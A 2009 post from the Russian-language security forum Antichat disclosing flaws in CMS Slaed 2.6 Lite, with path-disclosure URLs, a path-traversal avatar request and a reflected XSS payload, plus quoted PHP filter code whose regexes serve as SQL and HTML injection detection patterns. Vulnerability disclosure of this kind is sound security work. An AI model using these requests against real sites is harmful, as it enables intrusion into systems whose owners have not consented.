ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 01.11.2009, 14:28
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

CMS Slaed 2.6 Lite

Раскрытие путей

/index.php?name=Html_Content&op[]=page
/index.php?name=Account&op=info&uname[]=123

Уязвим файл /function/security.php

Код:
PHP код:
foreach ($_GET as $var_name=>$var_value) {
        if (
preg_match("/<.*?(script|body|object|iframe|applet|meta|style|form|img|onmouseover).*?>/i"urldecode($var_value)) || preg_match("/\([^>]*\"?[^)]*\)/"$var_value) || preg_match("/\"|\'/"$var_value)) warn_report("HTML in GET - ".$var_name." = "$var_value."");
        if (
$security_url_get == 1) {
            if (
preg_match("/^(http\:\/\/|ftp\:\/\/|\/\/|https:\/\/|php:\/\/|\/\/)/i"$var_value)) warn_report("URL in GET - ".$var_name." = "$var_value);
        }
        
$security_string "/UNION|OUTFILE|SELECT|ALTER|INSERT|DROP|".$prefix."_admins|".$prefix."_users|ModAdmin|SaveAdmin|EditAdmin|DelAdmin/i";
        
$security_decode base64_decode($var_value);
        if (
preg_match($security_string$security_decode)) hack_report("Hack base64 in GET - ".$var_name." = "$var_value."");
        if (
preg_match($security_string$var_value)) hack_report("Hack in GET - ".$var_name." = "$var_value."");
        
$security_slash preg_replace("/\/\*.*?\*\//"""$var_value);
        if (
preg_match($security_string$security_slash)) hack_report("Hack in GET - ".$var_name." = "$var_value."");
    } 
Незнаю даже как назвать. Вообщем.

/index.php?name=Account&op=saveavatar&category=2&av atar=../../../index.php

и в аватарке будет загружатся index.php

Уязвимый код:

PHP код:
$user_avatar = ($userinfo['user_avatar'] && file_exists("".$adirectory."/".$userinfo['user_avatar']."")) ? "<img src=\"".$adirectory."/".$userinfo['user_avatar']."\" alt=\"$user_name\" title=\"$user_name\" />" "<img src=\"".$adirectory."/00.gif\" alt=\"$user_name\" title=\"$user_name\" />"
Возможно ещё что нибудь найду.

XSS (Пассивная)

//"><script>alert();</script>
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ